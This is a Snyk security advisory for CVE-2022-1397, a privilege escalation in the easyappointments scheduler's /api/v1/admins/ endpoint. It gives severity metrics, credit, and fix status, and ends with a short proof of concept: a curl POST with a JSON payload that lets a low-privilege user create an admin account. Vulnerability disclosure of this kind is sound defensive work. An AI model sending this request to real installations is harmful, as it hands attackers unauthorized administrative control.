Privilege Escalation Affecting alextselegidis/easyappointments package, versions >=0.0.0
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (37th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-ALEXTSELEGIDISEASYAPPOINTMENTS-2813631
- published 11 May 2022
- disclosed 11 May 2022
- credit Francesco Carlucci
Introduced: 11 May 2022
CVE-2022-1397 Open this link in a new tabHow to fix?
A fix was pushed into the master branch but not yet published.
Overview
alextselegidis/easyappointments is a powerful Open Source Appointment Scheduler that can be installed on your server.
Affected versions of this package are vulnerable to Privilege Escalation via the /api/v1/admins/ endpoint, when the authorization is checked against the user's existence without validation of the user's permissions. Exploiting this vulnerability allows a low privileged user to create a new admin user.
PoC:
curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass
payload.json :
{
"id": 100,
"firstName": "Admin",
"lastName": "Admin",
"email": "admin@easyappointments.org",
"mobile": null,
"phone": "111",
"address": null,
"city": null,
"state": null,
"zip": null,
"notes": null,
"timezone": "UTC",
"settings": {
"username": "usern@me",
"password": "p@ssw0rd",
"notifications": true,
"calendarView": "default"
}
}